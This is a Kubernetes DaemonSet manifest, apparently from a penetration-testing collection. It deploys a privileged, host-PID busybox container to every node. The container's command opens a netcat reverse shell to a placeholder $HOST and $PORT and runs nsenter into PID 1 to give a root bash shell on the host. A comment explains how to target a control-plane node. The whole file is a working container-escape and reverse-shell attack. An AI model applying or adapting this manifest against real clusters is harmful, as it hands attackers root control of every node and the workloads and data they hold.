apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: priv-and-hostpid-revshell-daemonset
  labels:
    app: pentest
    type: daemonset
spec:
  selector:
    matchLabels:
      app: pentest
      type: daemonset
  template:
    metadata:
      labels:
        app: pentest
        type: daemonset
    spec:
      hostPID: true
      containers:
      - name: priv-and-hostpid-revshell-daemonset
        image: busybox
        securityContext:
          privileged: true
        command: [ "/bin/nc", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"]
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name